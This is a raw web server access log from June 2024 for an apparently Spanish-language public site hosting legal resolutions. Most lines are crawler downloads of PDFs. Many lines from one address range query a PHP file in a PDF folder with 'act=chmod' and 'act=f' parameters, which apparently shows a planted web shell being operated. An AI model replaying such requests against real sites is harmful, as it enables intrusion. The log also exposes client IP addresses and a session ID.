47.128.16.100 - - [29/Jun/2024:05:39:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3129.pdf HTTP/1.1" 200 2739
66.249.66.11 - - [29/Jun/2024:05:39:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3315.pdf HTTP/1.1" 200 372578
66.249.66.12 - - [29/Jun/2024:05:39:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3391.pdf HTTP/1.1" 200 580931
66.249.66.12 - - [29/Jun/2024:05:39:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2465.pdf HTTP/1.1" 200 332205
47.128.116.48 - - [29/Jun/2024:05:39:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=2833.pdf HTTP/1.1" 200 2715
66.249.66.12 - - [29/Jun/2024:05:39:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1539.pdf HTTP/1.1" 200 515291
201.245.192.253 - - [29/Jun/2024:05:39:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:05:39:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:05:40:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33273
47.128.38.101 - - [29/Jun/2024:05:40:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3569.pdf HTTP/1.1" 200 2740
47.128.37.96 - - [29/Jun/2024:05:40:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3216.pdf HTTP/1.1" 200 2715
66.249.66.11 - - [29/Jun/2024:05:40:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%2051-100/2002RES73.tif HTTP/1.1" 200 71052
47.128.47.243 - - [29/Jun/2024:05:40:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3795.pdf HTTP/1.1" 200 2715
66.249.66.11 - - [29/Jun/2024:05:40:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4351.pdf HTTP/1.1" 200 392233
66.249.66.11 - - [29/Jun/2024:05:40:58 -0500] "GET /BLA/resoluciones/AUTOS%202024/01697.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:05:40:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.21 - - [29/Jun/2024:05:41:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0110.pdf HTTP/1.1" 200 1523696
201.245.192.253 - - [29/Jun/2024:05:41:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.47.59 - - [29/Jun/2024:05:41:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4625.pdf HTTP/1.1" 200 2739
47.128.20.165 - - [29/Jun/2024:05:41:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4358.pdf HTTP/1.1" 200 2715
172.22.2.4 - - [29/Jun/2024:05:39:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.47.84 - - [29/Jun/2024:05:41:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=6862.pdf HTTP/1.1" 200 2740
216.245.221.92 - - [29/Jun/2024:05:41:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:05:41:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.47.26 - - [29/Jun/2024:05:41:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=04304.pdf HTTP/1.1" 200 2741
66.249.66.13 - - [29/Jun/2024:05:41:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0596.pdf HTTP/1.1" 200 474881
201.245.192.253 - - [29/Jun/2024:05:41:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:05:41:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2349.pdf HTTP/1.1" 200 420383
66.249.66.11 - - [29/Jun/2024:05:42:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1380.pdf HTTP/1.1" 200 431918
172.22.2.4 - - [29/Jun/2024:05:40:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
47.128.21.101 - - [29/Jun/2024:05:42:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=6720.pdf HTTP/1.1" 200 2715
47.128.30.187 - - [29/Jun/2024:05:42:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5258.pdf HTTP/1.1" 200 2740
47.128.32.150 - - [29/Jun/2024:05:42:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4598.pdf HTTP/1.1" 200 2715
201.245.192.253 - - [29/Jun/2024:05:42:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:05:43:00 -0500] "GET /Publicaciones/2024EE67457.pdf HTTP/1.1" 404 227
66.249.66.12 - - [29/Jun/2024:05:43:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3957.pdf HTTP/1.1" 200 413971
47.128.22.121 - - [29/Jun/2024:05:43:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=2906.pdf HTTP/1.1" 200 2715
47.128.48.122 - - [29/Jun/2024:05:43:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=01423.pdf HTTP/1.1" 200 2715
47.128.29.178 - - [29/Jun/2024:05:43:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2216.pdf HTTP/1.1" 200 2740
95.217.8.152 - - [29/Jun/2024:05:43:50 -0500] "GET /Publicaciones/2023EE12445.pdf HTTP/1.1" 404 227
201.245.192.253 - - [29/Jun/2024:05:43:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.99.47 - - [29/Jun/2024:05:43:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3841.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [29/Jun/2024:05:43:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:05:44:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1480.pdf HTTP/1.1" 200 435834
66.249.66.13 - - [29/Jun/2024:05:44:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3113.pdf HTTP/1.1" 200 781986
47.128.25.218 - - [29/Jun/2024:05:44:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3468.pdf HTTP/1.1" 200 2715
66.249.66.12 - - [29/Jun/2024:05:44:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20151-200/2002RES197.tif HTTP/1.1" 200 44214
47.128.25.193 - - [29/Jun/2024:05:44:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=2845.pdf HTTP/1.1" 200 2715
66.249.66.12 - - [29/Jun/2024:05:44:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3472.pdf HTTP/1.1" 200 815463
66.249.66.11 - - [29/Jun/2024:05:44:37 -0500] "GET /autoliquidacion/Solicitudes%20relacionadas%20con%20calidad%20del%20aire%20auditiva%20y%20visual/Solicitudes%20relacionadas%20a%20Programa%20de%20Autorregulaci%C3%B3n%20Ambiental/Aplicativo.html HTTP/1.1" 200 359
66.249.66.11 - - [29/Jun/2024:05:44:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0310.pdf HTTP/1.1" 200 518623
66.249.66.12 - - [29/Jun/2024:05:44:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1414.pdf HTTP/1.1" 200 445636
66.249.66.11 - - [29/Jun/2024:05:44:40 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%208%20del%201%20de%20Noviembre%20de%202013.pdf HTTP/1.1" 200 385156
66.249.66.12 - - [29/Jun/2024:05:44:43 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%203%20del%2014%20de%20Noviembre%20de%202014.pdf HTTP/1.1" 200 104132
66.249.66.11 - - [29/Jun/2024:05:44:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5354.pdf HTTP/1.1" 200 379233
47.128.25.200 - - [29/Jun/2024:05:44:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4765.pdf HTTP/1.1" 200 2740
66.249.66.11 - - [29/Jun/2024:05:44:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1065.pdf HTTP/1.1" 200 331812
